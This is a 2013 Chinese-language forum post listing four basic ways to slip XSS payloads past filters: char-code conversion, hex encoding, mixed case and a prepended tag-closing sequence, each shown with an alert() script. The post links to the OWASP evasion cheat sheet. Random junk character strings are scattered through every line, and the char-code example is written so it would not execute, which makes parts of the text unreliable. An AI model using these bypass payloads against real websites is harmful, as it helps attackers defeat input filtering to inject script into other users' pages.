四种超级基础的绕过方法。 `3 u' I1 v, G- V8 `
1.转换为ASCII码
1 Y) S2 b& G, i1 P例子:原脚本为<script>alert(‘I love F4ck’)</script >
2 F6 ]3 n5 Y' T; M: K; g- {通过转换,变成:
; h6 _' J" p$ B# @6 \2 }<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>) O/ ~5 y6 O* P H3 a
: {7 a: y$ k2 ]6 m4 \' b+ J( e2.转换为HEX(十六进制)4 M; ?! g5 [6 ?
例子:原脚本为<script>alert(‘I love F4ck’)</script>
# J1 ?( M; Z' u- V# T通过转换,变成:1 d$ p( `8 E1 l! V$ E
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
) O: N$ j: A$ I; L, C9 y 0 A- o3 e! |6 m1 `/ |. {* B, r
3.转换脚本的大小写& Z4 W- T6 J1 d2 k
例子:原脚本为<script>alert(‘I love F4ck’)</script>
0 ^* j% ]6 }9 r {* W3 q' |转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
+ F& L2 W3 q" P' N % }+ t) ~* D1 o! J. a" g! ^( ?' S
4.增加闭合标记”>
, o: @! @0 u `: q7 _9 V例子:原脚本为<script>alert(‘I love F4ck’)</script>
# w2 e4 G3 o1 _7 D转换为:”><script>alert(‘I love F4ck’)</script> h1 [: D: e! w7 ?
更详细绕过技术请参考此网页' @: ]2 }3 u. y
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet5 M8 M7 g/ N/ y- w6 e# d
5 w s& z& ^8 D/ h( B( G
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对